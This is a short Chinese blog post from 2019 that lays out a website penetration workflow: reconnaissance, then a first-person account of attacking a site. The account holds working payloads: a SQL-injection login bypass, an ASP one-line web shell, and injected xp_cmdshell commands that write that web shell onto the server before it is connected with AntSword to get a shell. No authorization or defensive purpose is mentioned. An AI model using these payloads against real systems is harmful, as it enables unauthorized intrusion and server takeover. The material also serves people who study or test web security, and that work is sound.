渗透过程

信息收集

1.IP信息

17CE

看是否存在cdn

存在的话,查找真实ip

  • 从国外去访问,查看ip信息
  • 去掉www,然后查看ip信息

2.旁站信息

  • webscan.cc

  • 站长之家

3.C段信息

  • webscan.cc

  • 站长之家

4.子域名信息

  • layer子域名挖掘机
  • subdomain

5.端口信息

  • nmap
  • portscan

6.网站目录信息

  • dirsearch
  • dirb

目的是扩大攻击面,寻找防护薄弱点和可利用信息

寻找可能存在漏洞的地方

  • 登陆界面 可能存在sql注入,可以先使用admin' or 1=1 --+ 之类的语句尝试绕过

  • 搜索界面 可能存在sql注入和存储型和DOM型xss等

  • 上传界面 可以上传一些木马之类东西:

    eg:上传一句话木马,然后使用中国蚁剑去连接(中国菜刀没有中国蚁剑好用!!)

  • 涉及密码或者其它敏感信息的地方 可以进行抓包分析,查看请求包和响应包,看一下有没有什么可以利用的信息,或者有可以修改的参数之类的东西,如果有进行修改,理解每个参数的意义和变化

一次成功的经验

收集信息发现子域名信息,找到一个可以利用的ip,进行端口扫描和网站目录爆破,发现后台管理界面,尝试万能密码进行绕过,成功,里面没有什么可以利用的信息,然后寻找上传接口,然后发现可以从登陆界面上传文件,

一句话木马:

<%execute(request("kxc"))%>

mysql开启存储过程

exec master..xp_cmdshell

echo中使用^转义特殊字符

ss' ;exec master..xp_cmdshell "echo dfvdf > D:\\KEFU\\a.asp"; --+

定义一个变量,然后将变量输入到文件中

sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:\KEFU\1.asp' exec master..xp_cmdshell @cmd;--+

然后使用中国蚁剑连接,可以获得服务器shell


参考链接

参考

posted @ 2019-07-12 21:39  tomyyyyy  阅读(300)  评论(0编辑  收藏  举报